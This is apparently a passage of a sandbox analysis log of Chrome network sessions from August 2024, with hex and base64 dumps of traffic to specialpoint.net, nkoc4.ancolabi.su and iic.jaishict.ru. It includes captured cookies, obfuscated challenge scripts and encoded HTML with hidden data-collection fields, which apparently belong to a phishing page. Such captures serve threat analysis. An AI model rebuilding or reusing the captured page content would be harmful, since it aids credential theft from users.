                                                                                                                                                                                                                                                                Data Ascii: RlWSh2YXIoLS1jYWxZRXh0KSkgc2NhbGVZKDEpO2FuaW1hdGlvbi10aW1pbmctZnVuY3Rpb246Y3ViaWMtYmV6aWVyKDAuNjYsLTAuMTYsMSwtMC4yOSk7fX0NCkBrZXlmcmFtZXMgb3BlbmVkLWZsYXAtc3dpbmd7MCUsMTAwJSwxNC41JSw3NiV7dHJhbnNmb3JtOnRyYW5zbGF0ZVkoLTY4cHgpIHJvdGF0ZTNkKDEsMCwwLC05MGRlZyk7f
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 69 50 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 5a 73 59 58 42 55 63 6d 6c 68 62 6d 64 73 5a 53 49 2b 50 43 39 6b 61 58 59 2b 50 43 39 6b 61 58 59 2b 50 43 39 6b 61 58 59 2b 50 47 52 70 64 69 42 70 5a 44 30 69 59 32 46 73 49 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 79 49 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 78 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 79 49 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 7a 49 48 4d 7a 49 6a 34 38 4c 32 52 70 64 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 79 49 6a 34 38 5a 47
                                                                                                                                                                                                                                                                Data Ascii: iPjxkaXYgY2xhc3M9ImZsYXBUcmlhbmdsZSI+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0iY2FsIj48ZGl2IGNsYXNzPSJ0Ij48L2Rpdj48ZGl2IGNsYXNzPSJyIj48ZGl2IGNsYXNzPSJzIHMxIj48L2Rpdj48ZGl2IGNsYXNzPSJzIHMyIj48L2Rpdj48ZGl2IGNsYXNzPSJzIHMzIj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSJyIj48ZG
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 49 6d 4a 73 64 47 52 79 5a 57 59 69 49 48 5a 68 62 48 56 6c 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 77 5a 57 4e 70 59 57 78 77 62 32 6c 75 64 43 35 75 5a 58 51 76 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 49 53 30 74 49 46 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 62 6d 39
                                                                                                                                                                                                                                                                Data Ascii: ImJsdGRyZWYiIHZhbHVlPSJodHRwczovL3NwZWNpYWxwb2ludC5uZXQvIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8IS0tIFN1Y2Nlc3MgaXMgbm9
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 43 41 75 4d 7a 51 30 4c 6a 45 79 4e 69 34 32 4d 7a 59 75 4d 7a 63 30 4c 6a 67 32 4e 53 34 79 4e 44 63 75 4d 6a 4d 75 4e 54 55 79 4c 6a 4d 30 4e 53 34 35 4d 44 59 75 4d 7a 51 31 63 79 34 32 4e 69 30 75 4d 54 45 31 4c 6a 6b 78 4c 53 34 7a 4e 44 56 6a 4c 6a 49 31 4c 53 34 79 4d 79 34 7a 4e 7a 6b 74 4c 6a 55 79 4c 6a 4d 33 4f 53 30 75 4f 44 59 31 49 44 41 74 4c 6a 4d 7a 4f 53 30 75 4d 54 49 31 4c 53 34 32 4d 7a 49 74 4c 6a 4d 33 4c 53 34 34 4e 7a 4e 68 4d 53 34 79 4e 6a 49 67 4d 53 34 79 4e 6a 49 67 4d 43 41 77 4d 43 30 75 4f 54 45 35 4c 53 34 7a 4e 6a 4e 4e 4e 54 49 75 4e 44 63 33 49 44 63 75 4e 6a 59 7a 59 54 55 75 4f 44 6b 79 49 44 55 75 4f 44 6b 79 49 44 41 67 4d 44 41 74 4d 53 34 78 4f 44 49 74 4c 6a 45 79 4e 32 4d 74 4c 6a 6b 33 4d 53 41 77 4c 54 45 75
                                                                                                                                                                                                                                                                Data Ascii: CAuMzQ0LjEyNi42MzYuMzc0Ljg2NS4yNDcuMjMuNTUyLjM0NS45MDYuMzQ1cy42Ni0uMTE1LjkxLS4zNDVjLjI1LS4yMy4zNzktLjUyLjM3OS0uODY1IDAtLjMzOS0uMTI1LS42MzItLjM3LS44NzNhMS4yNjIgMS4yNjIgMCAwMC0uOTE5LS4zNjNNNTIuNDc3IDcuNjYzYTUuODkyIDUuODkyIDAgMDAtMS4xODItLjEyN2MtLjk3MSAwLTEu


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                22192.168.2.449854188.114.97.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:21 GMT
                                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Length: 7832
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y71QO5iPrGUFNctUgfI3OSj1y1bRDlRZt4YI89GquHx7fMSP0%2Bj0ZM%2BMPRqkQ%2F4mtMgK2iV7N9x5JEDah475VITuF9BPKGZqEJioBJSCk%2FIxQ3HEw2EVlN6rT2r7CT5pYUo%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c78848062369-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC689INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 67 2c 68 2c 6d 2c 6e 2c 6f 2c 79 2c 7a 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 55 2c 66 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 70 61 72 73 65 49 6e 74 28 55 28 33 35 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 32 31 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 55 28 33 34 39 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 33 35 38 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 55 28 33 35 36 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 55 28 33 38 30 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 34 30 34 29 29 2f 37 29 2b 70 61 72 73
                                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,m,n,o,y,z){V=b,function(c,e,U,f,C){for(U=b,f=c();!![];)try{if(C=parseInt(U(357))/1+-parseInt(U(321))/2+parseInt(U(349))/3*(-parseInt(U(358))/4)+parseInt(U(356))/5+parseInt(U(380))/6*(-parseInt(U(404))/7)+pars
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 5d 2c 4f 3d 30 2c 50 3d 30 2c 51 3d 30 3b 51 3c 44 5b 61 32 28 33 38 37 29 5d 3b 51 2b 3d 31 29 69 66 28 52 3d 44 5b 61 32 28 34 31 38 29 5d 28 51 29 2c 4f 62 6a 65 63 74 5b 61 32 28 33 36 35 29 5d 5b 61 32 28 34 32 30 29 5d 5b 61 32 28 33 38 39 29 5d 28 48 2c 52 29 7c 7c 28 48 5b 52 5d 3d 4c 2b 2b 2c 49 5b 52 5d 3d 21 30 29 2c 53 3d 4a 2b 52 2c 4f 62 6a 65 63 74 5b 61 32 28 33 36 35 29 5d 5b 61 32 28 34 32 30 29 5d 5b 61 32 28 33 38 39 29 5d 28 48 2c 53 29 29 4a 3d 53 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 32 28 33 36 35 29 5d 5b 61 32 28 34 32 30 29 5d 5b 61 32 28 33 38 39 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 61 32 28 34 30 36 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 45 2d 31 3d 3d 50 3f 28
                                                                                                                                                                                                                                                                Data Ascii: ],O=0,P=0,Q=0;Q<D[a2(387)];Q+=1)if(R=D[a2(418)](Q),Object[a2(365)][a2(420)][a2(389)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(365)][a2(420)][a2(389)](H,S))J=S;else{if(Object[a2(365)][a2(420)][a2(389)](I,J)){if(256>J[a2(406)](0)){for(G=0;G<M;O<<=1,E-1==P?(
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 6f 72 28 3b 3b 29 69 66 28 4f 3c 3c 3d 31 2c 45 2d 31 3d 3d 50 29 7b 4e 5b 61 32 28 33 32 33 29 5d 28 46 28 4f 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 50 2b 2b 3b 72 65 74 75 72 6e 20 4e 5b 61 32 28 33 38 34 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 61 33 29 7b 72 65 74 75 72 6e 20 61 33 3d 61 30 2c 44 3d 3d 6e 75 6c 6c 3f 27 27 3a 27 27 3d 3d 44 3f 6e 75 6c 6c 3a 66 2e 69 28 44 5b 61 33 28 33 38 37 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 34 29 7b 72 65 74 75 72 6e 20 61 34 3d 61 33 2c 44 5b 61 34 28 34 30 36 29 5d 28 45 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 35 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 35
                                                                                                                                                                                                                                                                Data Ascii: or(;;)if(O<<=1,E-1==P){N[a2(323)](F(O));break}else P++;return N[a2(384)]('')},'j':function(D,a3){return a3=a0,D==null?'':''==D?null:f.i(D[a3(387)],32768,function(E,a4){return a4=a3,D[a4(406)](E)})},'i':function(D,E,F,a5,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(a5
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 38 35 29 5d 3d 27 6e 27 2c 6e 5b 56 28 34 31 36 29 5d 3d 27 49 27 2c 6f 3d 6e 2c 67 5b 56 28 33 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 2c 45 2c 46 2c 61 61 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 61 61 3d 56 2c 44 3d 3d 3d 6e 75 6c 6c 7c 7c 44 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 46 3b 66 6f 72 28 48 3d 78 28 44 29 2c 43 5b 61 61 28 33 34 32 29 5d 5b 61 61 28 33 34 36 29 5d 26 26 28 48 3d 48 5b 61 61 28 33 39 31 29 5d 28 43 5b 61 61 28 33 34 32 29 5d 5b 61 61 28 33 34 36 29 5d 28 44 29 29 29 2c 48 3d 43 5b 61 61 28 34 31 39 29 5d 5b 61 61 28 33 38 33 29 5d 26 26 43 5b 61 61 28 34 30 38 29 5d 3f 43 5b 61 61 28 34 31 39 29 5d 5b 61 61 28 33 38 33 29 5d 28 6e 65 77 20 43 5b 28 61 61 28 34 30 38 29 29 5d 28 48 29 29 3a 66
                                                                                                                                                                                                                                                                Data Ascii: 85)]='n',n[V(416)]='I',o=n,g[V(328)]=function(C,D,E,F,aa,H,I,J,K,L,M){if(aa=V,D===null||D===void 0)return F;for(H=x(D),C[aa(342)][aa(346)]&&(H=H[aa(391)](C[aa(342)][aa(346)](D))),H=C[aa(419)][aa(383)]&&C[aa(408)]?C[aa(419)][aa(383)](new C[(aa(408))](H)):f
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 63 74 5b 61 38 28 33 36 38 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 27 31 39 38 32 35 39 38 78 4d 41 47 76 4c 2c 73 74 72 69 6e 67 69 66 79 2c 70 75 73 68 2c 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 2c 2f 30 2e 30 37 39 34 38 39 38 32 30 38 35 35 38 38 30 30 35 3a 31 37 32 33 34 36 35 34 38 34 3a 65 48 4a 41 4c 6d 61 79 5f 4e 35 69 31 52 78 6c 4b 6e 62 49 72 66 7a 6e 30 36 71 4f 64 2d 5a 6e 74 46 59 5a 68 38 77 4c 52 6f 34 2f 2c 2f 62 65 61 63 6f 6e 2f 6f 76 2c 6f 6e 74 69 6d 65 6f 75 74 2c 73 63 73 77 33 2c 50 4f 53 54 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 67 47 6b 76 69 32 3b 77 6f 69 62 35 3b 75 46 62 71 6f 33 3b 66 68 65 6b 6c 33 3b 58 74 54 4a 33 3b 42 48 76 53 6a
                                                                                                                                                                                                                                                                Data Ascii: ct[a8(368)](c));return e}function a(ah){return ah='1982598xMAGvL,stringify,push,contentDocument,/0.07948982085588005:1723465484:eHJALmay_N5i1RxlKnbIrfzn06qOd-ZntFYZh8wLRo4/,/beacon/ov,ontimeout,scsw3,POST,_cf_chl_opt;gGkvi2;woib5;uFbqo3;fhekl3;XtTJ3;BHvSj
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 43 46 24 63 76 24 70 61 72 61 6d 73 2c 6e 6f 77 2c 73 74 72 69 6e 67 27 2e 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 68 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 33 31 37 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 66 2c 43 2c 5a 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 29 7b 69 66 28 5a 3d 56 2c 21 69 28 2e 30 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 44 3d 5b 5a 28 33 33 34 29 2b 66 2c 5a 28 33 33 31 29 2b 4a 53 4f 4e 5b 5a 28 33 32 32 29 5d 28 43 29 5d 5b 5a 28 33 38 34 29 5d 28 5a 28 33 33 32 29 29 3b 74
                                                                                                                                                                                                                                                                Data Ascii: CF$cv$params,now,string'.split(','),a=function(){return ah},a()}function b(c,d,e){return e=a(),b=function(f,g,h){return f=f-317,h=e[f],h},b(c,d)}function l(f,C,Z,D,E,F,G,H,I,J){if(Z=V,!i(.01))return![];D=[Z(334)+f,Z(331)+JSON[Z(322)](C)][Z(384)](Z(332));t
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC298INData Raw: 56 2c 63 3d 67 5b 61 65 28 33 31 38 29 5d 2c 21 63 29 72 65 74 75 72 6e 3b 69 66 28 21 6a 28 29 29 72 65 74 75 72 6e 3b 28 65 3d 21 5b 5d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 66 2c 44 29 7b 28 61 66 3d 61 65 2c 21 65 29 26 26 28 65 3d 21 21 5b 5d 2c 44 3d 41 28 29 2c 6b 28 63 2e 72 2c 44 2e 72 29 2c 44 2e 65 26 26 6c 28 61 66 28 33 37 32 29 2c 44 2e 65 2c 61 66 28 33 39 38 29 29 29 7d 2c 68 5b 61 65 28 33 36 37 29 5d 21 3d 3d 61 65 28 33 37 36 29 29 3f 66 28 29 3a 67 5b 61 65 28 33 37 35 29 5d 3f 68 5b 61 65 28 33 37 35 29 5d 28 61 65 28 33 34 34 29 2c 66 29 3a 28 43 3d 68 5b 61 65 28 33 36 30 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 5b 61 65 28 33 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 67 29 7b 61 67 3d 61 65 2c 43 28 29 2c 68 5b 61
                                                                                                                                                                                                                                                                Data Ascii: V,c=g[ae(318)],!c)return;if(!j())return;(e=![],f=function(af,D){(af=ae,!e)&&(e=!![],D=A(),k(c.r,D.r),D.e&&l(af(372),D.e,af(398)))},h[ae(367)]!==ae(376))?f():g[ae(375)]?h[ae(375)](ae(344),f):(C=h[ae(360)]||function(){},h[ae(360)]=function(ag){ag=ae,C(),h[a


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                23192.168.2.449855188.114.97.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC789OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2 HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:21 GMT
                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                cf-chl-out: OhOIsEBqdqMmA/gFNvNJhquyOh7KTXaZvzE=$aQ7QSXVuHcZrctx7
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYPguTDiW7%2FxNLOA2DSmLrb2Jbu4T6P%2BKbDMB3526MdlwChyc2UAwEg4o%2BEuY%2BWkbIyRpHDjNhW9cCg3urHyQGPclvfXJqf092Vygp4QeUeWYuABE4ckfoQ4hFe2qy0ztLIc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c78b3ac332e2-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                24192.168.2.449856104.21.62.2204437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1322OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                Host: nkoc4.ancolabi.su
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://nkoc4.ancolabi.su/YOBEzWvY/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: XSRF-TOKEN=eyJpdiI6InlKcUlyckxIYVJReWdiaU9neFg5RlE9PSIsInZhbHVlIjoicEhNZUsvNE0xK2NEbWpTRG41YTJ3c2ZsZFU5dmtxQkc1WEZpc0JTdzVqajVxblIvYlo4Z0V1M3lsbnFsdENyTXRCNmZ4N3pSQXpzWWpEWVVyUUxtRGxGTzV2ZERYU2gyeTV4YUYvMEdpMTd4aHRnbU4xUG4vdjB6a1UxdzVCeTUiLCJtYWMiOiJiMjhiZjVjZWJlMGE4NDYwYTNhOWUzMWM1ZTI2MzMxODc1NWJkNzYzNzlmOTMzMWUxMzIxZWNjZjI3Y2I3MTY5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5RYitvVmt3RzcyaVhpckRKckxmR2c9PSIsInZhbHVlIjoiaDBwS2dJbkxOMmduaEt6TVFUaHdWRjk1Y1Q3d3llUm1vSUlxZm1leGkvYUdPWGdvRkpOcmdWK0N1NnZiRGFJMUp6VERkNktSZGVmbk9DclhxRCtVeC9adW1qeG45bms1U1A4VjVGL1lZaUxQWnI4QmlrMWVGSDFZaWFnNDRDVEoiLCJtYWMiOiIzMTU0ODFiZWNmNzMyODFiNzY4ODU0ZjJhNTE0MTNkODA5OTljNmQ2M2M5NGZjMDYxOWFjNzE5NmU5ZjNlYmEzIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                2024-08-12 13:23:22 UTC651INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:22 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nEKbNGwpenXs%2BXA1xBvg2zMoy5IkBM08lUZm73zMz%2F7F7FT9W4p4OTFTcc%2FpIL9gW%2FPP3EgHBJ7W0dv2qP87iok%2B5kdrKJ6zntv1%2Bnf7zu%2FNQoEbFoT8QV%2Be3b%2F8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                Age: 1770
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c78eff25c402-EWR
                                                                                                                                                                                                                                                                2024-08-12 13:23:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                25192.168.2.449857188.114.97.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:22 UTC602OUTGET /pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ HTTP/1.1
                                                                                                                                                                                                                                                                Host: iic.jaishict.ru
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://nkoc4.ancolabi.su
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://nkoc4.ancolabi.su/
